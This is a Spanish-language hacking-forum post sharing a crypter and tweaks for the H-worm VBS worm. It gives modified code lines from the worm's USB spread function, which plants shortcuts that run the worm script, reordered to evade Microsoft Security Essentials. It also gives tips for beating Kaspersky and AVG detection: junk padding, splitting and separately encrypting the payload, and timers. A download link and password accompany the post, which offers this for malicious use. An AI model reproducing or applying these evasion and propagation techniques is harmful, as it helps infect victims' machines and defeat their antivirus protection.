Nota1: Segun experimentos que hice en forma local security essentials no lo detecta a no ser que en la configuracion del servidor hayamos activado la funcion spread, en ese caso hay que modificar unas lineas en el servidor antes de encriptar, le muestro que es lo que se modifica para que no sea detectado por essentials cuando genera los accesos directos en la funcion spread
busquen estas lineas en el server h-worm
antes... funcion spread de archivos
Código: Seleccionar todo
"/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
Código: Seleccionar todo
"/c start " & replace(file.name," ", chrw(34) & " " & chrw(34)) & "&start " & replace(installname," ", chrw(34) & " " & chrw(34)) &"&exit"
espero entiendan....la funcion spread lo que hace es generar un acceso directo por cada archivo que esta en el extraible usb y ejecuta 1ro el vbs y luego el archivo en cuestion, cambiando estas lineas de codigo primero se ejecutaria el archivo y luego el server script
Nota2: pueden agregar basura en el server antes de encriptar tambien probe combinaciones por ejemplo partir el servidor en 2 y encriptar en forma independiente luego unir los dos encriptados en un solo archivo solido, los que entienden un poco de script se daran cuenta.
Al encriptador le agregue basura y algunos temporizadores para engañar a los AV es el caso de kas, avg
Espero lo difruten, todo el credito para MadAntrax por codear esta maravilla.
Saludos!!
Descarga aqui [Enlace externo eliminado para invitados] >>> reupload 11-03-18
scan realizado por el amigo otroyomismo http://www.indetectables.net/scanner.ph ... oka1bf4pvv
El pass : ***Mucho Cuidado con esto***
PD no me hago responsable del mal uso de esta herramienta jaja. No me llenen de MP